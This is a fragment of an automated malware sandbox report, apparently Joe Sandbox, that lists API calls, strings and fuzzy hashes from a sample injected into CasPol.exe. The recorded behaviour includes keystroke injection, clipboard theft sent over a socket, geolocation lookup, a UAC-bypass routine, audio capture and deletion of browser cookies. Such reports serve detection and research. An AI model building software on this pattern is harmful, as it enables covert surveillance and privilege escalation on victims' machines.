                                                                                                            • __alloca_probe_16.LIBCMT ref: 00449AD7
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                                                                                            • __freea.LIBCMT ref: 00449B47
                                                                                                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                            • __freea.LIBCMT ref: 00449B50
                                                                                                            • __freea.LIBCMT ref: 00449B75
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3864826663-0
                                                                                                            • Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                                            • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                                                                                                            • Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                                            • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                                                                                            APIs
                                                                                                            • SendInput.USER32 ref: 00418B18
                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                                                                                              • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InputSend$Virtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1167301434-0
                                                                                                            • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                            • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                                                                            • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                            • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                                                                            APIs
                                                                                                            • OpenClipboard.USER32 ref: 00415A46
                                                                                                            • EmptyClipboard.USER32 ref: 00415A54
                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                            • String ID:
                                                                                                            • API String ID: 2172192267-0
                                                                                                            • Opcode ID: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
                                                                                                            • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                                                                            • Opcode Fuzzy Hash: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
                                                                                                            • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                            • String ID: a/p$am/pm$fD
                                                                                                            • API String ID: 3509577899-1143445303
                                                                                                            • Opcode ID: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                                                                                                            • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                            • Opcode Fuzzy Hash: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                                                                                                            • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00447ECC
                                                                                                            • _free.LIBCMT ref: 00447EF0
                                                                                                            • _free.LIBCMT ref: 00448077
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                                                                            • _free.LIBCMT ref: 00448243
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 314583886-0
                                                                                                            • Opcode ID: cb8f7ca8a171defcb3766c71ed5ef1c67b5ed23ec682f857e370b1562df754d8
                                                                                                            • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                                                                                                            • Opcode Fuzzy Hash: cb8f7ca8a171defcb3766c71ed5ef1c67b5ed23ec682f857e370b1562df754d8
                                                                                                            • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 7c9beb2791b6ce89b88df1f42b01a9acb1f91b5f19b960fb620ecff1e548522d
                                                                                                            • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                            • Opcode Fuzzy Hash: 7c9beb2791b6ce89b88df1f42b01a9acb1f91b5f19b960fb620ecff1e548522d
                                                                                                            • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                            • _free.LIBCMT ref: 00444096
                                                                                                            • _free.LIBCMT ref: 004440AD
                                                                                                            • _free.LIBCMT ref: 004440CC
                                                                                                            • _free.LIBCMT ref: 004440E7
                                                                                                            • _free.LIBCMT ref: 004440FE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$AllocateHeap
                                                                                                            • String ID: Z7D
                                                                                                            • API String ID: 3033488037-2145146825
                                                                                                            • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                            • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                            • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                            • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                            APIs
                                                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A115
                                                                                                            • __fassign.LIBCMT ref: 0044A190
                                                                                                            • __fassign.LIBCMT ref: 0044A1AB
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 1324828854-0
                                                                                                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                            • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                            • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                            APIs
                                                                                                            • ExitThread.KERNEL32 ref: 004017F4
                                                                                                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                            • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                            • String ID: T=G$>G$>G
                                                                                                            • API String ID: 1596592924-1617985637
                                                                                                            • Opcode ID: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
                                                                                                            • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                                                                            • Opcode Fuzzy Hash: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
                                                                                                            • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnumInfoOpenQuerysend
                                                                                                            • String ID: TUFTUF$>G$DG$DG
                                                                                                            • API String ID: 3114080316-344394840
                                                                                                            • Opcode ID: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                                                                                                            • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                                                                            • Opcode Fuzzy Hash: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                                                                                                            • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                            APIs
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                            • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                                                                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                            • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                                                                            APIs
                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                            • API String ID: 1133728706-4073444585
                                                                                                            • Opcode ID: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                                                                                                            • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                                                                                            • Opcode Fuzzy Hash: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                                                                                                            • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                                            • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                                                                                            • Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                                            • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                            • int.LIBCPMT ref: 0040FC0F
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                            • String ID: p[G
                                                                                                            • API String ID: 2536120697-440918510
                                                                                                            • Opcode ID: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                                                                                                            • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                                                                                            • Opcode Fuzzy Hash: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                                                                                                            • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                                                                            Strings
                                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                                            • API String ID: 3121278467-91888290
                                                                                                            • Opcode ID: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                                                                                                            • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                                                                                            • Opcode Fuzzy Hash: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                                                                                                            • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                                                                                                            APIs
                                                                                                              • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                            • _free.LIBCMT ref: 0044FD39
                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                            • _free.LIBCMT ref: 0044FD44
                                                                                                            • _free.LIBCMT ref: 0044FD4F
                                                                                                            • _free.LIBCMT ref: 0044FDA3
                                                                                                            • _free.LIBCMT ref: 0044FDAE
                                                                                                            • _free.LIBCMT ref: 0044FDB9
                                                                                                            • _free.LIBCMT ref: 0044FDC4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                            • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                            • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                                                                            APIs
                                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                            • API String ID: 3851391207-2637227304
                                                                                                            • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                            • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                            • String ID: h]G
                                                                                                            • API String ID: 2536120697-1579725984
                                                                                                            • Opcode ID: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                                                                                                            • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                                                                                            • Opcode Fuzzy Hash: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                                                                                                            • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                            Strings
                                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                            • API String ID: 2018770650-304995407
                                                                                                            • Opcode ID: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                                                                                                            • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                                                                                                            • Opcode Fuzzy Hash: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                                                                                                            • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                                                                                                            APIs
                                                                                                            • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                            Strings
                                                                                                            Memory Dump Source
